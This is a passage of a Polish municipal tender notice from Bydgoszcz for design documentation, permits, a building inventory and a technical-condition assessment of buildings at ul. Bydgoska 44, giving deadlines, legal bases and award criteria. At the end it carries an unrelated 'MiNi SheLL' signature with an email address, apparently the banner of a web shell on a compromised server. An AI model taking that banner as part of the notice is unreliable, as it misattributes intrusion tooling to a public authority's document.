d) szczegółową specyfikację techniczną wykonania i odbioru robót: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz.,
6) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej  pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Pozostałe  warunki  realizacji  zamówienia:
1) Zamawiający przekaże Wykonawcy, wybranemu do realizacji zamówienia - stosowne pełnomocnictwo (na pisemne żądanie) - w celu uzyskania przez niego niezbędnych opinii (w tym Miejskiego Konserwatora Zabytków), uzgodnień, koniecznych do opracowania dokumentacji projektowej oraz uzyskania przez              niego decyzji zatwierdzającej dokumentację projektową i udzielającej pozwolenia na wykonanie robót budowlanych. 
2) rozliczenie wynagrodzenia wykonawcy nastąpi jedną fakturą/rachunkiem, po wykonaniu całego świadczenia, obejmującego opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie decyzji pozwolenia na wykonanie robót budowlanych objętych projektem.
3) cała dokumentacja winna być przekazana Zamawiającemu również w formie elektronicznej, zapisanej na nośniku płyta CD/DVD w ilości 1 szt. -  z tym, że do odczytu - z rozszerzeniem PDF; do edycji - pliki rysunków w formacie dxf lub dwg, a kosztorys inwestorski i przedmiar robót winien być sporządzony w  programie Norma Pro wersja 4.43. (pliki w rozszerzeniu pdf i ath)
4) każdy egzemplarz dokumentacji winien być trwale oprawiony, w sposób uniemożliwiający jego zdekompletowanie. Wykonawca zobowiązany jest przekazać Zamawiającemu dodatkowe egzemplarze dokumentacji (ponad wymaganą liczbę), jeżeli zażąda tego Zamawiający, przy czym Wykonawca ma wówczas prawo żądać zwrotu uzasadnionych kosztów powielenia
Termin wykonania zamówienia. 
1) termin wykonania i dostarczenia Zamawiającemu dokumentacji projektowo-kosztorysowej zgodnie z ofertą wykonawcy,  jednak nie później niż  60 dni  od  daty podpisania umowy przez wykonawcę
2) termin uzyskania przez Wykonawcę i dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową 90 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo-kosztorysowej, o którym mowa w pkt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania  dokumentacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 100/P/2016.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje opracowanie inwentaryzacji budowlanej i ekspertyzy stanu technicznego dla budynków gminnych  zlokalizowanych na nieruchomości przy ul. Bydgoska 44  (działka nr 74, obręb 343)  na osiedlu Stary Fordon  w Bydgoszczy  (budynki nr 3,4,5 zaznaczone na mapie poglądowej). 
-  szczegółowy zakres inwentaryzacji budowlanej określa załącznik  nr 9/1do SIWZ
-  szczegółowy zakres ekspertyzy stanu technicznego określa załącznik nr 9/2 do SIWZ
- zamawiający załącza dodatkowe informacje o nieruchomości wraz z mapką sytuacyjną jako materiał pomocniczy dla wykonawcy do opracowania inwentaryzacji  -  załącznik nr 9/3 do SIWZ 
4.2. Wykonawca zobowiązuje się wykonać opisany w pkt.4.1. SIWZ przedmiot umowy zgodnie                           z zasadami wiedzy technicznej, przepisami regulującymi przedmiotową problematykę, a w szczególności              z przepisami wynikającymi  z :
1. ustawy z dnia 7 lipca 1994 r. Prawo budowlane  (Dz. U. 2013.1409 z późn. zm.),
2. ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2015 r. poz. 2164, z późń. zm.)  
3. rozporządzenia Ministerstwa Infrastruktury z  dnia 2 września 2004 r. w sprawie szczegółowego zakresu formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. 2013.1129 ),
4. ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa  w ochronie środowiska  oraz ocenach oddziaływania na środowisko (Dz. U. 2013.1235             z póź. zm.),
5. rozporządzenia Ministerstwa Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U.2004.130.1389),
6. rozporządzenia Ministra Infrastruktury z dnia 17 marca 2009 r. w sprawie szczegółowego  zakresu i form audytu energetycznego oraz części audytu remontowego, wzorów kart audytów, a także algorytmu oceny opłacalności przedsięwzięcia termomodernizacyjnego (Dz.U.2009.43.346) ,
7. rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie wzorów: wniosku o pozwolenie na budowę, oświadczenia o posiadanym prawie do dysponowania nieruchomością na cele budowlane i decyzji o pozwoleniu na budowę (Dz. U. Nr 120, poz. 1127 z późn. zm.)
8. ustawy  z dnia 16 kwietnia 2004r. o ochronie przyrody ( Dz. U. 2004.92.880 z późn. zm.),
9. ustawy  z dnia 27 kwietnia 2001 r. prawo ochrony środowiska ( Dz. U. 2008.25.150 z późn. zm. )
Termin wykonania zamówienia:
1) termin opracowania inwentaryzacji budowlanej dla wszystkich obiektów na nieruchomości przy                     
ul. Bydgoskiej 44 :  60 dni  od daty podpisania umowy przez Wykonawcę. 
2) termin opracowania ekspertyzy stanu technicznego  dla wszystkich obiektów na nieruchomości przy  ul. Bydgoskiej 44 :  80 dni  od daty podpisania umowy przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 80.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania  dokumentacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com